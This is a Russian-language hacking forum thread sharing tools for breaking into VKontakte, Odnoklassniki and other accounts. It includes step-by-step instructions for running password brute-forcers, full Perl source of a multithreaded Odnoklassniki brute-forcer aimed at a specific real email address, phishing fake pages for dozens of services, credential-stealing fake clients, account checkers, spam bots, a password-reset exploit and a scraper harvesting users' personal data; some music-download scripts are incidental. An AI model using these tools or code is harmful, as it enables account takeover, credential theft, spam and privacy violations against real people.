Уязвимости, фичи, получаем пароль

[Noctambulaar]

В данный момент очень популярны, стали соц. сети. Тут и рассмотрим фичи.

В файлах:
C!klodoL brut

Как запустить скрипт:

Цитата:

--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.

RATE checker
VkBrute v. 1.03

GUI-приложение, позволяющее брутить и чекать аккаунты Vkontakte.ru. Больше тебе не придется поднимать сервак только из-за того, что нужно поюзать чужой скрипт
Что,как,где
Checker:
Проверяет валидность акка и записывает валид в good.txt по дефолту.

Accounts file->Загружаем файл вида:
email@host:password

Bruter:
Пытается подобрать пароль для заранее обозначенных email-ов.
Брутит пары mailass
Из валидных аккаунтов извлекает рейтинг пользователя
Выходной файл будет в формате:
user@host:pass:rating

Misc
Поддержку прокси пока я выключил (альфа ведь)))
Hint
Чтобы пробрутить диапазон мыльников по одному паролю - поместите в файл паролей ваш пароль, и все емейлы будут брутиться по нему.
To-Do-List
В планах добавить спамилку групп с парсингом друзей владельца акка и рассылки им приглашений (тк многие сейчас стали запрещать посторонним приглашать их в группы).

Программа сырая, на стадии alpha, отписывайтесь здесь, какие глюки нашли, а так же ваши пожелания по поводу развития программ

Odnokl brut Kaimi


Словари для брута:
Русский словарь 194 775 строк
Англ. словарь, 3 ляма
Просто тупо набор англ. букв 194 775 строк
Beale wordlist - 7776 слов
Большой словарь (около 500000 слов)
Cловарь последовательных клавиатурных символов
Числовой словарь
Очень много словарей на разных языках, но размеры их не большие


Фейк контакта:тут
Взлом вконтакте, статья тут
Мелкие пакости вконтакте тут


PS: В этой теме нет помощи, помоги себе сам! Вопросы задавать в других темах.

 

[Winux]

Фейк без видео и в виде аттача
В архиве выше лежит еще видео,брут и еще какаято херня

 

[Noctambulaar]

[Vkontakte] Qspamer by Chaak
Возможности:
Возможность отправлять коментарии к более чем 1938112 вопросам
Возможность установить задержку
Поддержка прокси
Поддержка логирования
Вывод в реальном времени
:zns2: смотреть

[Vkontakte] VKontakte Wall Messenger
Этот PHP скрипт написан с использованием сокетов и технологии Ajax. Основные фичи:
[ - ]Рассылать сообщения на стены ВКонтакте по диапазону id
[ - ]Рассылать сообщения на стены друзей каждого заданного аккаунта
[ - ]Флуд на стену конкретного человека
[ - ]Рассылка на собственные стены каждого заданного аккаунта
[ - ]Позволяет указать задержку отправки
[ - ]Позволяет рандомизировать сообщение
[ - ]Позволяет задать список прокси-серверов
[ - ]Добавление предложения каждому заданному аккаунту
[ - ]Добавление вопроса каждому заданному аккаунту
[ - ]Добавление заметки каждому заданному аккаунту
[ - ]Улучшены логи, статистика, исправлены мелкие недочеты
[ - ]Добавлен чекер аккаунтов
:zns2: смотреть

[odnoklassniki] сплоит
RST сплоит. Суть-баг в системе восстановления пароля. Шестизначный код выставляется в ссылке-подтверждени и легко брутится (кол-во попыток не лимитировано).
Нужно знать только мыло.
:zns2: смотреть

[LiveInternet.Ru] Спамер + Чекер
Описание: Спамер дневников пользователей данного сервиса.

Спам-сообщение скрипт оставляет в комментариях к последней записи в дневнике.
:zns2: смотреть

[Vkontakte] akk Checker by Chaak
Скрипт проверяет аккаунты на валидность, показывает в реальном времени в браузере:
id
количество друзей
рейтинг
количество неиспользованных голосов
:zns2: смотреть

[Vkontakte] VKTools (alpha)
GUI-приложение, позволяющее брутить и чекать аккаунты Vkontakte.ru. Больше тебе не придется поднимать сервак только из-за того, что нужно поюзать чужой скрипт
Что,как,где
Checker:
Проверяет валидность акка и записывает валид в good.txt по дефолту.
:zns2: смотреть

[Vkontakte] Инвиз вконтакте
статья.
:zns2: смотреть

[Vkontakte] bruteforce C#

Программа для перебора паролей от аккаунтов Вконтакте.ру, на C#
-Полный перебор, указывается алфавит и длина пароля.
-Перебор по словарю (планируется)
-Планируюется сделать перебор с эвристикой (т.е. это немного модифицированный полный перебор, учитывается что в словах не может быть подряд 2 гласной и 3 согласных букв)

скачать
исполн. файл
сорц

 

[Noctambulaar]

[Vkontakte] Фейк вконтакте агента

Присылает введенные данные на ваш E-Mail( Настраиваеться в билдере )

скачать

[odnoklassniki] фейк агента

скачать

[Vkontakte][odnoklassniki] веб фейки:

- VKontakte.ru
- Yahoo.com
- YouTube.com
- odnoklassniki.ru
- hotmail.ru
- mail.ru
- pochta.ru
- rambler.ru
- yandex.ru
- Gmail.com
- ICQ.com
- AOL.com - AIM
- d2jsp
- DailyMotion.com
- eBay.com
- EverQuest Forum
- FaceBook.com
- FileFront.com
- Gmail.de
- Habbo.de
- Habbohotel.com
- Itunes
- Megaupload.com
- MMOCheats
- Myspace
- Nexon.net
- OGame.de
- Oxedion
- Packstation
- PayPal.com
- PhotoBucket.com
- Plesk
- RapidShare.com
- RapidShare.de
- Ripway.com
- siteworld.de
- Skype.com
- Steam Phishing Site
- Strato
- VanGuard
- Usenext
- tutbu

рапида
депозит

[odnoklassniki] Многопоточный брутер odnoklassnikiru

#!/usr/bin/perl

use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;
use threads;
##############START#################
print "\n AAAAAA OOOOOO H   H\n";
print " A    A O    O H   H\n";
print " AAAAAA O    O HHHHH\n";
print " A    A O    O H   H\n";
print " A    A OOOOOO H   H\n\n";

open (FP , '<pass.txt') || die ("No password list! \n");  # Пароли в  pass.txt
my @pass = <FP>;
close FP;

my $email = 'yusdinara@yandex.ru'; # МЫЛО!
my $i=0;
my @thr;
my $ua = LWP::UserAgent->new;
my $cookies = HTTP::Cookies->new(agent => 'Opera/9.50 (X11; Linux x86_64; U; ru)');
$ua->cookie_jar($cookies);   #Куки;)
for (@pass)
{
my $nowpass = $_;
chomp @pass;
if($thr[$i]) {threads->object($thr[$i]->tid())->join;}
$thr[$i]=threads->create(\&brute,$email,$nowpass);

$i=($i+1) % 5; #Количество потоков  (5)

}

foreach(threads->list) { $_->join; }

sub brute()
{

$ua->cookie_jar($cookies);
my $req = $ua->post('http://w17.odnoklassniki.ru/cdk/st.cmd/login/tkn/5622', {
'st.posted'=>'set',
'st.email'=>$_[0],
'st.password'=>$_[1],
'button_go'=>'%D0%92%D0%BE%D0%B9%D1%82%D0%B8'
})->as_string;

my $result = $req =~/302 Found/;
if ($result)
{
print "[+]OK $_[0]:$_[0]\n";
open (G , '>>good.txt');
print G $_[0].":".$_[1]."\n";
close G;
die ('PASSWORD FOUND!!!!!\n\n\n');
}
else
{
print "[-] BAD $_[0]\n";

}}

#c0ded by Xszz.AoH;
#c0pyright AoH.Team http://aoh.name;

 

[Noctambulaar]

[Vkontakte] brutforce by Chaak

Возможности:

* Брут на один email по списку паролей
* Брут на один пароль по списку email
* Брут по списку email:password

Преимущества:

* Графический интерфейс
* Большое количество настроек
* Простота
* Скорость при одном потоке - 15 паролей в секунду
* Работа на сервере

Требования:

* PHP-хостинг с поддержкой сокетов

Установка и настройка:

1. Залить скрипт на сервер
2. Выставить права(chmod) на файл good.txt - 777
3. В файл dictionary.txt положить лист паролей или email'ov или список email:password
4. Запустить скрипт index.php и настроить его по своим нуждам.
5. Запустить и пойти пить пиво
6. Придти посмотреть пароли
7. Недостаок только в том чтотут один поток =(

скачать

[Vkontakte] brutforce

скачать

VKontakte Grabber 1.0 by DX
Описание скрипта:

Скрипт собирает данные из открытых анкет. Необходимо задать несколько десятков аккаунтов вконтакте (сотни валидных хватит точно). Скрипт автоматически выберет все валидные и начнёт сбор, выводя иногда информацию в браузер. По пути будут отбрасываться аккаунты, имеющие рейтинг менее 30% (если таковые окажутся среди заданных). Все данные будут сохраняться в таблицу в БД MySQL. Если запись с заданным id уже существует, она будет просто обновлена. Если скрипт обнаружит сообщение вконтакте "Слишком быстрый просмотр страниц", то автоматически будет применена задержка.
С помощью viewer.php можно сделать выборку из базы по всем доступным полям.
Несмотря на то, что php не поддерживает многопоточность, можно открыть несколько экземпляров скрипта и собирать анкеты с разных диапазонов id.

Скрипт умеет собирать следующие данные:

ID
Имя
Фамилия
Пол
Дата рождения
Город рождения
Религиозные взгляды
Политические взгляды
Семейное положение
Мобильный телефон
Домашний телефон
ICQ
web-сайт
деятельность
ВУЗы
школы
лицеи
гимназии
текущий ВУЗ
интересы
любимая музыка
любимые фильмы
любимые TV-шоу
любимые книги
любимые игры
любимые цитаты
"обо мне"
Из всего этого можно выбрать, что нужно конкретно.

Комплекс состоит из следующих файлов:

setup.php - инсталлятор, его необходимо запустить в первую очередь
index.php - сам граббер
viewer.php - позволяет сделать выборку ID из базы по различным критериям
viewid.php - вызывается из viewer.php - просмотр данных о человеке с заданным ID

Требования для работы скрипта:

PHP с поддержкой fsockopen и set_time_limit(0); ignore_user_abort - опционально
MySQL 4.1 и выше
Несколько десятков аккаунтов вконтакте с рейтингом больше 30%

скачать

 

[Noctambulaar]

[Vkontakte] Авторегер вКонтакте.ру

[*]Регистрация
[*]Parser мейл
[*]активация

Скачать

thx Сталину

[Vkontakte] akkChecker by Chaak

Скрипт проверяет аккаунты на валидность, показывает в реальном времени в браузере:
-id
-количество друзей
-рейтинг
-количество неиспользованных голосов
Функции:
-Вывод результатов
-Сохранение в виде email:pass:id
-Сохранение/не сохранение акков с рейтингом <30%
-Поддержка прокси
Отмечает все хорошее белым цветом(кол-во друзей > 200, рейтинг>100, кол-во неисп. голосов >0)

Сохраняет в файл(accounts.txt) акки в виде:
email:pass или email:pass:id

Update & bugfix:
-Добавлена поддержка прокси
-Добавлен Duplicate killer
-Добавлено отсеивание акков с низким рейтингом
-Добавлена сортировка акков по email'у
-Добавлена функция подсчета всех друзей
-Добавлена поддержка Transparent proxy
-Исправлен баг с языками(изза которого не отображались некоторые показатели)
-Исправлена функция GoldRate, которая не правильно работала.
-Ускорен вывод данных

Скачать

[Vkontakte] PrivateMessage Spamer

Скрипт спамит личными сообщениями, друзьям вконтакте.

Скачать
thx bZik

 

[Noctambulaar]

[Vkontakte] [Загрузка Музыки \ Видео на компьютер]
1) Рассмотрим вариант с музыкой, ее можно загрузить с помощью программ и скриптов!
Скрипты:

Описание:

Скрипт для GreaseMonkey или браузера Opera
Добавляет около кнопок прослушивания музыки ссылку для скачивания и ссылку для быстрого поиска слов песни.
Для работы нужен Firefox с установленным дополнением GreaseMonkey или Opera.
Если вы используете Opera, то полученный файл надо будет сохранить в тот каталог,
который выбран в “Tools > Preferences > Advanced > Content > JavaScript option > User JavaScript files”

// ==UserScript== 
// @name vkontakte music download 
// @namespace http://vkontakte.net.ru 
// @description Music download for vkontakte.ru 
// @include http://vkontakte.ru/* 
// ==/UserScript== 


function addDownload(img) { 
var str=""; 
if (img.wrappedJSObject) { 
str=img.wrappedJSObject.onclick.toString(); 
} else { 
str=img.onclick.toString(); //opera workaround 
} 
var re=/operate((d+)[^0-9]+(d+)[^0-9]+(d+),[^0-9a-zA-Z]+([0-9a-zA-Z]+)/; 
var arr=re.exec(str); 
//operate(209145,1044,362847,'db5a6cba31',194); 
//http://cs1044.vkontakte.ru/u362847/audio/db5a6cba31.mp3 
var td=img.parentNode; 
var addon=document.createElement("a"); 
var user=arr[3]; 
if (user<100000) { 
user=parseInt(user)+100000; 
user=(user.toString()).substr(1); 
} 
addon.setAttribute("href","http://cs"+arr[2]+".vkontakte.ru/u"+user+"/audio/"+arr[4]+".mp3"); 
addon.innerHTML="download"; 
td.appendChild(addon); 
} 

function addDownloads() { 
var imgs=document.getElementsByTagName("img"); 

for (var i=0;i<imgs.length;i++) { 
if (imgs[i].className=="playimg") { 
addDownload(imgs[i]); 
} 
} 
} 

function addLyric(span) { 
var title=span.innerHTML; 
if (span.getElementsByTagName("a").length>0) { 
title=span.getElementsByTagName("a")[0].innerHTML; 
} 
var parent=span.parentNode; 
var artb=parent.getElementsByTagName("b")[0]; 
var artist=artb.innerHTML;  
if (artb.getElementsByTagName("a").length>0) { 
artist=artb.getElementsByTagName("a")[0].innerHTML; 
} 
var newdiv=document.createElement("div"); 
var addon=document.createElement("a"); 
// addon.setAttribute("href","http://lyrc.com.ar/en/tema1en.php?artist="+artist+"&songname="+title); 
addon.setAttribute("href","http://www.lyricsplugin.com/wmplayer03/plugin/?artist="+encodeURIComponent(artist)+"&title="+encodeURIComponent(title)); 
addon.setAttribute("target","_blank"); 
addon.innerHTML="lyrics"; 
newdiv.appendChild(addon); 
newdiv.className="duration"; 
parent.parentNode.appendChild(newdiv); 
} 

function addLyrics() { 
var spans= document.getElementsByTagName("span"); 
re=/titled+/; 
for (var i=0;i<spans.length;i++) { 
if (re.test(spans[i].id)) { 
addLyric(spans[i]); 
} 
} 
} 

addLyrics(); 
addDownloads();

Сохранить в vkontakte.music.js

Грабер музыки с вконтакта:

<html>  
<body>  
<center>  
<form action="graber.php" name="main" method="post">  
<input type="text" name="link" size="80">  
<input type="submit" value="Грабить!">  
<form>  


<?php  
set_time_limit(0);                                                   //убираем ограничение времени выполнения скрипта  
if(@$_POST['link']!=""){  

$link = $_POST['link'];                                               //Указываем ссылку  

$toparse="";  

preg_match("/^(http:\/\/)?([^\/]+)/i",$link,$host);                    //Отделяем  доменное имя   

$req = "GET ".$link." HTTP/1.1\r\n";                                                                          //Формирование  заголовка запроса  
$req .="Host: ".$host[2]."\r\n";                                                                                             //    
$req .="Cookie: audio_vol=80;remixchk=5;remixemail=;remixmid=;remixpass=;#10\r\n";    //Передача кукис  
$req .="Connection: Close\r\n\r\n";                                                                                           //  

                                   
$socket = fsockopen($host[2],80);                                     //Открываем сокет на 80й порт серва  

fwrite($socket,$req);                                                 //Отправляем запрос   

while(!feof($socket)){                                                 //  
    $toparse.=fgets($socket,128);                                       //Получаем тело страницы по 128 байт  
    }                                                                //  
      
fclose($socket);                                                     //Затрываем сокет  

$mask_link =array('return operate(',');');                             //Маска  

preg_match_all("/(".$mask_link[0].")(.*)(".$mask_link[1].")/i",$toparse,$parsed_links);  //Выбираем ссылки  



foreach($parsed_links[3] as $link_str){                                 //Берем каждый елемент масива в переменную $link_str  
      
    $pattern=array("(",")","'");                                     //Что заменяем  
    $replace=array("","","");                                         //Чем заменяем  
      
    $replaced=str_replace($pattern,$replace,$link_str);              //Убираем скобки  
    $link_mas=explode(",",$replaced);                                 //Преобразуем строку где разделитель запятая в масив  
      
echo "<a href=\"http://cs".$link_mas[1].".vkontakte.ru/u".$link_mas[2]."/audio/".$link_mas[3].".mp3\">";    //Начало ссылки  

    $mask_name=array($link_mas[0],'<\/span>');                         //Маска поиска Имени  
      
    preg_match_all("/(".$mask_name[0].")(.*)(".$mask_name[1].")/i",$toparse,$parsed_names);   // Выбираем имена  

    $pattern=array("\">","</b>","<span id=\"title$link_mas[0]");                                //Что заменяем  
    $replace=array("","","");                                                                    //Чем заменяем  
      
    $replaced=str_replace($pattern,$replace,$parsed_names[2][0]);                             //Убираем мусор  

      
    echo $replaced."</a>
";                                                                  //Конец ссылки  
}  
}      
?>  


</center>  
</body>  
</html>

Еще один скрипт:

javascript:function operate(konfuze,loves,you,all_,xP){you=you.toStrin  g(10);while(you.length<5){you='0'+you;}document.getElementById('audio'+ko  nfuze).innerHTML='<div><a href="http://cs'+loves+'.vkontakte.'+'ru/u'+you+'/audio/'+all_+'.mp3">Cкачать '+document.getElementById('performer'+konfuze).inn  erHTML+' - '+document.getElementById('title'+konfuze).innerHT  ML+'</a></div>
';}

[Вступить во все группы данного пользователя]
1)Сам скрипт:

<form id="param">  
<table width="500" height="101" border="0">  
<tr>  
<td width="112">with</td>  
<td width="378"><input name="minZn" type="text" value="1"></td>  
</tr>  
<tr>  
<td>to</td>  
<td><input name="maxZn" type="text" value="999999"></td>  
</tr>  
<tr>  
<td>adress</td>  
<td><input name="adress" type="text" value="http://vkontakte.ru/groups.php?act=enter&gid=" size="50"></td>  
</tr>  
<tr>  
<td> </td>  
<td><input name="button" type="button" onClick="GoHack()" value="Vkontakte must die!!(Go hack)">  
<input name="button2" type="button" onClick="StopHack()" value="STOP"></td>  
</tr>  
</table>  
</form>  
<script language="javascript">  
function StopHack()  
{  
hackwindow.close();  
}  

function HackWindowNewlocation(start, end, current)  
{  
var time=4000;  
var domen=document.getElementById("param").adress.value;  
var url="";  
start2=start;  
current2=current;  
end2=end;  
if(current2==start2){hackwindow=window.open("http://google.ru","hack");}  
if ((current2-1)==end2) {return;}  
current2++;  
url=domen+current.toString();  
window.hackwindow.location=url.toString();  
setTimeout("HackWindowNewlocation(start2, end2, current2)",time);  
}  

function GoHack()  
{  
var start=document.getElementById("param").minZn.value;   
var end=document.getElementById("param").maxZn.value;   
var current=start;  
HackWindowNewlocation(start,end,current);  
}  
</script>

 

[Noctambulaar]

[Vkontakte] VkChat_by_a1ien фейк flash

Переделанный скрипт от AdReNa1!Ne.
[ + ] Проверка логина при вводе нажатии кнопки вход
[ + ] После ввода верного логина подгружается сторонний чат(не открывается никаких левых окон)

http://xss.pro/style_emoticons/default/software.gif скачать

write sec | null, bZik